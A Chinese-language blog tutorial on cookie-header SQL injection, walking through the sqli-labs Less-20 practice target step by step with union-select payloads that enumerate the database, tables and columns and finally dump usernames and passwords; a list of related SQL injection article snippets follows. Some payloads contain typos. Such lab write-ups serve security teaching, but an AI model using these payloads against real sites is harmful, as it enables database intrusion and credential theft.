2. 程式人生 > 其它 >sql注入--------(http頭注入--cookie注入)

sql注入--------(http頭注入--cookie注入)

阿新 發佈:2022-04-02

http注入------cookie注入

一、cookie的基本概念

               Cookie 並不是它的原意“甜餅”的意思, 而是一個儲存在客戶機中的簡單的文字檔案, 這個檔案與特定的 Web 文件關聯在一起, 儲存了該客戶機訪問這個Web 文件時的資訊, 當客戶機再次訪問這個 Web 文件時這些資訊可供該文件使用。由於“Cookie”具有可以儲存在客戶機上的神奇特性, 因此它可以幫助我們實現記錄使用者個人資訊的功能, 而這一切都不必使用複雜的CGI等程式  舉例來說, 一個 Web 站點可能會為每一個訪問者產生一個唯一的ID, 然後以 Cookie 檔案的形式儲存在每個使用者的機器上。如果使用瀏覽器訪問 Web, 會看到所有儲存在硬碟上的 Cookie。在這個資料夾裡每一個檔案都是一個由“名/值”對組成的文字檔案,另外還有一個檔案儲存有所有對應的 Web 站點的資訊。在這裡的每個 Cookie 檔案都是一個簡單而又普通的文字檔案。透過檔名, 就可以看到是哪個 Web 站點在機器上放置了Cookie(當然站點資訊在檔案裡也有儲存) ;
         也就是說cookie是記錄客戶端快取的一種資訊,紀錄客戶端的id資訊等到客戶端進入網站時,網站會根據cookie呼叫相應的快取檔案; 二、cookie注入               cookie通常以http請求頭的方式傳送給伺服器,但是一些網站資料庫對使用者傳送的cookie沒有進行嚴格的過濾,這就使通關拼接sql語句進行惡意查詢存在可能; 三、例析             這裡我們以sqllabs靶場less20進行實踐;              開啟靶場,發現是一個登入頁面,輸入使用者名稱admin進入,頁面回顯了user-agent,cookie;猜測這裡存在cookie注入點,這裡使用hacker外掛進行演示,當然也可以使用burp進行抓包修改cookie;
             首先,在cookie上輸入admin' and 1=1 # 和admin' and 1=2# 發現回顯頁面不同,所以這裡可能存在字元型注入點;     確定存在字元型漏洞後使用order by函式進行子段數查詢; payload:  uname=admin' and 1=2 order by  4#  當輸入欄位數為三時,頁面回顯正常,而為四時頁面回顯出現錯誤,說明只存在三個欄位      已經測得字元數,接下來使用聯合查注的方法查詢回顯位; payload:username=admin' and 1=2 union select 1,2,3 #

根據頁面我們可以1,2,3均為回顯位;所以我們可以使用回顯位顯示出我們想要查詢的內容;

得到回顯位後接下來就是查詢資料庫和版本號;

payload: username= admin' and 1=2 union slect 1,database(),version() #

得到資料庫後我們就可以查詢資料庫中有哪些表;

payload:username=admin' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

通過查詢得到了資料庫裡面有那些表,然後我們就可以查詢列名;

payload:username=admin' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#

最後,就是username,password兩個欄位的內容;

payload:username=admin' and 1=2 union select 1,2group_concat(username,password) from users #

到這裡我們就得的了lusername和paaaword;

相關推薦

sql注入--------http注入--cookie注入

http注入------cookie注入 一、cookie的基本概念                Cookie 並不是它的原意“甜餅”的意思, 而是一個儲存在客戶機中的簡單的文字檔案, 這個檔案與特定的 Web 文件關聯在一起, 儲存了該客戶機訪

淺談計算機網路HTTP/HTTPS/TCP/UDP/IP

前言 計算機網路是計算機專業很重要的一門課,課程中詳細闡述了兩臺計算機之間是如何進行通訊、如何保證通訊的可靠性、如何保證通訊的高效性等等內容,在日常coding中可能比較少關注到這方面,但是在真正遇到網路方面

linux中部署apache服務http服務或者web服務

apache服務即為網頁服務,apache服務的軟體包叫httpd。 以下實驗在PC1主機中完成

ROS/C++建立自己的類庫檔案和原始檔

技術標籤:ros學習筆記cmake 文章目錄 目標標檔案的防衛式宣告Step1 新建標檔案point.hppStep2 建立原始檔point.cppStep3 修改CMakeLists.txtStep 4 新建一個程式驗證是否可以包含該標檔案

常見的SQL語句建立、刪除、切換

@ 快速入門SQL語句 此文章方便與忘記的同學,或者是想快速入門的同學,做的一個小筆記 ,望指正!

一條有思考SQL編寫Oracle資料庫,DECODE函式

今天在工作中遇到一個比較有意思的業務場景,不知道大家平時是怎麼解決。Oracle資料庫

HTTP請求引發的注入問題 (SQL注入)

關於請求注入問題的演示,這裡我寫了一些測試案例,用來測試請求中存在的問題。

【轉】通過 HTTP 進行 SQL 注入

>>> 通過 HTTP 進行 SQL 注入 英文原文:SQL Injection through HTTP Headers 在漏洞評估和滲透測試中,確定目標應用程式的輸入向量是第一步。這篇文章解釋了別人是如何通

xff使用sqlmap注入心血來潮的分享

今天看見墨者學院的一個靶場 x-forwarded-for注入靶場 我很少逛墨者學院,一直在看書

sql注入報錯注入

1、通過floor報錯,注入語句如下: and select 1 from (select count(),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a);

SQL注入-DNS注入

其實就是盲注的簡化版本,不過這種方式確實簡單,不需要寫py指令碼一點點去跑

漏洞重溫之sql注入

漏洞重溫之sql注入 sqli-labs通關之旅 填坑來了! Less-17 首先,17關,我們先檢視一下頁面,發現網頁正中間是一個登入框。

漏洞重溫之sql注入FUZZ

漏洞重溫之sql注入FUZZ [強網杯 2019]隨便注 首先,根據頁面,發現頁面上有一個搜尋框,並且url裡面沒有id等引數控制頁面,粗略猜測該位置的注入型別是POST型。

CTF基本:SQL注入之get引數注入附靶機下載連結永久有效

靶機地址: 連結:https://pan.baidu.com/s/1MhYXwhaJ8u08-b-6fg4lXg 提取碼:8520 準備環境:

初學Web安全之sql注入—— 盲注1

盲注 當你的輸入沒有回顯,也沒有報錯的時候,但是輸入正確和錯誤的值時,頁面有不同表現時,這時候我們可以嘗試使用布林盲注

關於sql注入詳解

sql注入 威脅簡介 SQL注入是比較常見的網路攻擊方式之一,它不是利用作業系統的BUG來實現攻擊,而是針對程式設計師程式設計時的疏忽,通過SQL語句,實現無帳號登入,甚至篡改資料庫。

SQL注入Get

SQL注入 當Web應用向後臺數據庫傳遞SQL語句進行資料庫操作時。如果對使用者輸入的引數沒有經過嚴格的過濾處理,那麼攻擊者就可以構造特殊的SQL語句,直接輸入資料庫引擎執行,獲取或修改資料庫中的資料。

SQL注入之二次注入sql-lab第24關

什麼是二次注入 二次注入可以理解為,攻擊者構造的惡意資料儲存在資料庫後,惡意資料被讀取並進入到SQL查詢語句所導致的注入。防禦者可能在使用者 輸入惡意資料時對其中的特殊字元進行了轉義處理,但在惡意資

CTF-SQL注入POST

實驗環境: 攻擊者:Kali Linux192.168.0.10 靶機:Oracle VM VirtualBox 6.1.10——Ubuntu32-bit192.168.0.250

SQL注入-堆疊注入堆查詢注入

關閉頁面特效 原文地址;http://www.sqlinjection.net/stacked-queries/ 本篇屬於集合原作者的思路和個人想法結合的一篇產物。Stacked injection 漢語翻譯過來後,國內有的稱為堆查詢注入,也有稱之為堆疊注入。個人